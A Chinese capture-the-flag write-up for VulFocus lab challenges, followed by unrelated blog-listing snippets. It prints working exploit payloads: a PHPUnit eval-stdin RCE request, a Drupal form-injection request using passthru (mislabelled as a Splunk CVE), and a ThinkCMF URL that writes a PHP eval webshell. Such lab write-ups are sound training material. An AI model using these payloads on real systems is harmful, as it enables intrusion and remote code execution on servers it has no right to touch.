当前位置：首页 > news >正文

漏洞指北-VulFocus靶场专栏-初级02

news 2025/9/14 13:30:29

漏洞指北-VulFocus靶场02-初级

初级005 🌸phpunit 远程代码执行 (CVE-2017-9841)🌸
- - - step1：进入漏洞页
    - step2： burpsuite 抓包,等待请求页，获得flag
初级006 🌸splunk 信息泄露（CVE-2018-11409）🌸
- - - step1：admin changeme 登录，然后进入页面，取消
    - step2 -设置 -> 添加数据 -> 监视 -> 文件和目录 -> 浏览文件->tmp目录找到flag
初级007 🌸splunk 信息泄露（CVE-2018-11409）🌸
- - - step1 进入注册页面进行注册
    - step2：burp suite抓 POST请求包
初级008 🌸thinkcmf 文件包含 x1.6.0-x2.2.3🌸
- - - step1 进入页面写入一句话木马
  - step2 中国蚂蚁剑连接webshell

初级005 🌸phpunit 远程代码执行 (CVE-2017-9841)🌸

原因：
PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架。通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录，则存在远程代码执行漏洞。
解决方案：

step1：进入漏洞页

http://10.11.12.28:8621/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

step2： burpsuite 抓包,等待请求页，获得flag

修改get请求为post，并加上<?php system('ls /tmp');?>

初级006 🌸splunk 信息泄露（CVE-2018-11409）🌸

step1：admin changeme 登录，然后进入页面，取消

在这里插入图片描述

step2 -设置 -> 添加数据 -> 监视 -> 文件和目录 -> 浏览文件->tmp目录找到flag

在这里插入图片描述

初级007 🌸splunk 信息泄露（CVE-2018-11409）🌸

step1 进入注册页面进行注册

.cn/74d0fbe236a8474d97e20756913907f2.png)

step2：burp suite抓 POST请求包

在这里插入图片描述

一个非常憨逼的事情，就是不知道flag在哪，然后突发奇想，既然把指令都能执行命令，如果直接ls /tmp,然后数据就拿到手了。这地方卡了我很久，看了很多教程感觉都不一样。

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 10.11.12.28
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.18.7:8088/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
Content-Length: 742
Connection: closeform_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=passthru&mail[#type]=markup&mail[#markup]=ls /tmp-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"ls /tmp
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax" flag-{bmhe1d4ed70-7c7d-428a-8fb7-cf4145dc6805}

初级008 🌸thinkcmf 文件包含 x1.6.0-x2.2.3🌸

原因：
ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。
解决方案：

step1 进入页面写入一句话木马

http://10.11.12.28:17809/?a=fetch&templateFile=public/index&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27shell.php%27,%27%3C?php%20@eval($_POST[111]);%20?%3E%27)%3C/php%3E

step2 中国蚂蚁剑连接webshell

在这里插入图片描述

漏洞指北-VulFocus靶场专栏-初级02

漏洞指北-VulFocus靶场02-初级初级005 🌸phpunit 远程代码执行 (CVE-2017-9841)🌸step1：进入漏洞页step2： burpsuite 抓包,等待请求页，获得flag 初级006 🌸splunk 信息泄露 （CVE-2018-11409&am…...

编程日记 2023/8/21 19:08:44

无论是小说、公文还是新闻稿，爱校对都是你的最佳选择

在这个数字化的时代，写作已经渗透到我们生活的方方面面。从小说家到政府官员，再到新闻记者，每个人都需要确保他们的文本内容无瑕疵、逻辑清晰。这就是“爱校对”进入舞台的地方。它不仅仅是一个校对工具，更是每个写作者都不可或缺…...

编程日记 2023/8/21 19:07:43

MySQL数据表的损坏及容灾解决方案

引言在互联网应用中，MySQL是最常用的关系型数据库之一。然而，数据表的损坏可能会导致数据丢失或无法正常访问，给业务运营带来严重影响。本文将讨论MySQL数据表容易损坏的情况，并提供相应的容灾解决方案。推荐阅读 AI文本 OCR…...

编程日记 2023/8/21 19:06:42

【仿写tomcat】二、扫描java文件，获取带有@WebServlet注解的类

tomcat仿写项目结构扫描文件servlet注解map容器servlet工具类启动类调用项目结构扫描文件之前当然要确定一下项目结构了，我这里的方案是tomcat和项目同级项目的话就仿照我们平时使用的结构就好了，我们规定所有的静态资源文件都在webApp目录下存放…...

编程日记 2023/8/21 19:05:40

pytorch2.0.1 安装部署（cpu+gpu） linux+windows

官网打开可能较慢，耐心等待 pytorch官网以下操作在默认网络环境即可使用，2023年8月20日更新一、说明和前期准备 1.pytorch是一个和tensorflow类似的框架如果需要安装tensorflow，可以参考： tensorflow 1，2 cpugpu…...

编程日记 2023/8/21 19:04:38

Java数据结构学习和源码阅读（线性数据结构）

线性数据结构链表 LinkList 链表的数据结构一组由节点组成的数据结构，每个元素指向下一个元素，是线性序列。最简单的链表结构： 数据指针（存放执行下一个节点的指针） 不适合的场景： 需要循环遍历将…...

编程日记 2023/8/21 19:03:36

华为网络篇多区域OSPF-32

难度2复杂度2 目录一、实验原理二、实验拓扑三、实验步骤四、实验过程总结一、实验原理 OSPF是一种具有区域概念的路由协议，为什么需要分区域？像RIP那样都在一个区域配置也不多这样简单点不是更好吗？OSPF它是一种功能十分强大的IG…...

编程日记 2023/8/21 19:02:35

【HCIP】03.VLAN高级技术

Eth-trunk 链路聚合，定义出一个逻辑聚合口，把物理接口和逻辑接口关联，此时在STP中，会把多个物理接口看成一个逻辑接口，此时不会出现环路。接口负载分担（逐包|逐流） 基于IP的散列算法能保证包…...

编程日记 2023/8/21 19:01:34

WebSocket服务端数据推送及心跳机制(Spring Boot + VUE)

一、WebSocket简介 HTML5规范在传统的web交互基础上为我们带来了众多的新特性，随着web技术被广泛用于web APP的开发，这些新特性得以推广和使用，而websocket作为一种新的web通信技术具有巨大意义。WebSocket是HTML5新增的协议，它的…...

编程日记 2023/8/21 19:00:32

根据Dockerfile创建容器案例讲解

-f为dokerfile的路径， -t为新镜像的名称及版本。后面这个点是寻址路径。...

编程日记 2023/8/21 18:59:30

CF 1328 D Carousel(环构造）

CF 1328 D. Carousel(环构造) Problem - D - Codeforces 大意：给出一个 n 个数组成的环 ， 要对环上的点染色 ， 要求任意一个相邻数不同的点对染色不同 ，求使用最少的颜色数 ， 并用颜色数排列构造一种染色方案。思路…...

编程日记 2023/8/21 18:58:28

什么是SaaS、PaaS、aPaaS、iPaaS、IaaS，一文讲透

在数字化的带动下，各行业对云服务的需求进入快速增长期。 SaaS、PaaS、aPaaS、iPaaS、IaaS…… 这些词经常出现，那么他们分别是什么意思？又有什么区别？小帆带大家一起来看看~ SaaS SaaS，Software as a Service&…...

编程日记 2023/8/21 18:57:27

编辑环境配置 # 或者 vim ~/.bash_profile $ vim ~/.zshrc贴入镜像 # 淘宝镜像 export NVM_NODEJS_ORG_MIRRORhttp://npm.taobao.org/mirrors/node export NVM_IOJS_ORG_MIRRORhttp://npm.taobao.org/mirrors/iojs# nvm环境配置 export NVM_DIR"$HOME/.nvm"[ -s &quo…...

编程日记 2023/8/21 18:56:24

aardio简单网站css或js下载练习

import win.ui; /*DSG{{*/ var winform win.form(text"下载网站css或js";right664;bottom290;maxfalse) winform.add( buttonClose{cls"button";text"退出";left348;top204;right498;bottom262;color14120960;fontLOGFONT(h-14);note" &qu…...

编程日记 2023/8/21 18:55:23

“维度削减+逻辑回归”：如何使用PCA大幅提升乳腺癌的预测成功率？

一、引言乳腺癌是女性中最常见的恶性肿瘤之一，也影响着全球范围内许多人们的健康。据世界卫生组织（WHO）的数据，乳腺癌是全球癌症发病率和死亡率最高的肿瘤之一，其对个体和社会的危害不可忽视。因此，早期乳…...

编程日记 2023/8/21 18:54:21

Python程序设计基础：random库的使用

文章目录一、常见的random库函数二、应用实例一、常见的random库函数在使用Python语言进行编程计算时，计算机完成的计算主要是确定的，但是在将其进行应用时，人们会模拟现实生活中的现象和活动，希望其增加一些随机性&#xff0…...

编程日记 2023/8/21 18:53:19

webpack 打包全流程

目录 1 webpack的安装 2 webpack的配置配置流程： 1 webpack安装 2 创建webpack配置文件 webpack.config.js 3 配置入口 entry 单入口和多入口 2. 动态配置入口文件 4 配置出口 output 5 配置模式 mode（webpack4） 6 配置解析策略 …...

编程日记 2023/8/21 18:52:17

如何准备软件开发项目成本估算？

软件开发的成本估算是出了名的困难。对于软件开发项目来说，预算超支反而是常态，而不是例外。在开始估算之前，请从业务角度了解项目的战略目标和你的目标。你可能计划尽可能赚取更多利润，探索新技术，或者在项目可能亏…...

编程日记 2023/8/21 18:51:16

音视频FAQ（三）：音画不同步

摘要本文介绍了音画不同步问题的五个因素：编码和封装阶段、网络传输阶段、播放器中的处理阶段、源内容产生的问题以及转码和编辑。针对这些因素，提出了相应的解决方案，如使用标准化工具、选择强大的传输协议、自适应缓冲等。此外&#xff0…...

编程日记 2023/8/21 18:50:15

MFC为控件添加背景图片

1、添加选择Bitmap导入图片，图片文件最好放在项目res目录中，同时是BMP格式。上传后的图片在资源视图，命名为IDB_BITMAP_M_BACK。 2、在cpp的C***Dlg::OnPaint()函数下添加如下代码 void C***Dlg::OnPaint() {CPaintDC dc(this); // device…...

编程日记 2023/8/21 18:49:12

使用VSCode开发Django指南

使用VSCode开发Django指南一、概述 Django 是一个高级 Python 框架，专为快速、安全和可扩展的 Web 开发而设计。Django 包含对 URL 路由、页面模板和数据处理的丰富支持。本文将创建一个简单的 Django 应用，其中包含三个使用通用基本模板的页面。在此…...

编程新知 2025/9/14 10:33:45

【Linux】shell脚本忽略错误继续执行

在 shell 脚本中，可以使用 set -e 命令来设置脚本在遇到错误时退出执行。如果你希望脚本忽略错误并继续执行，可以在脚本开头添加 set e 命令来取消该设置。举例1 #!/bin/bash# 取消 set -e 的设置 set e# 执行命令，并忽略错误 rm somefile…...

编程新知 2025/9/11 15:27:32

React第五十七节 Router中RouterProvider使用详解及注意事项

前言在 React Router v6.4 中，RouterProvider 是一个核心组件，用于提供基于数据路由（data routers）的新型路由方案。它替代了传统的 <BrowserRouter>，支持更强大的数据加载和操作功能（如 loader 和…...

编程新知 2025/9/9 10:11:43

Leetcode 3577. Count the Number of Computer Unlocking Permutations

Leetcode 3577. Count the Number of Computer Unlocking Permutations 1. 解题思路2. 代码实现题目链接：3577. Count the Number of Computer Unlocking Permutations 1. 解题思路这一题其实就是一个脑筋急转弯，要想要能够将所有的电脑解锁&#x…...

编程新知 2025/9/12 18:19:00

五年级数学知识边界总结思考-下册

目录一、背景二、过程1.观察物体小学五年级下册“观察物体”知识点详解：由来、作用与意义**一、知识点核心内容****二、知识点的由来：从生活实践到数学抽象****三、知识的作用：解决实际问题的工具****四、学习的意义：培养核心素养…...

编程新知 2025/6/20 13:47:44

在WSL2的Ubuntu镜像中安装Docker

Docker官网链接: https://docs.docker.com/engine/install/ubuntu/ 1、运行以下命令卸载所有冲突的软件包： for pkg in docker.io docker-doc docker-compose docker-compose-v2 podman-docker containerd runc; do sudo apt-get remove $pkg; done2、设置Docker…...

编程新知 2025/9/14 10:43:41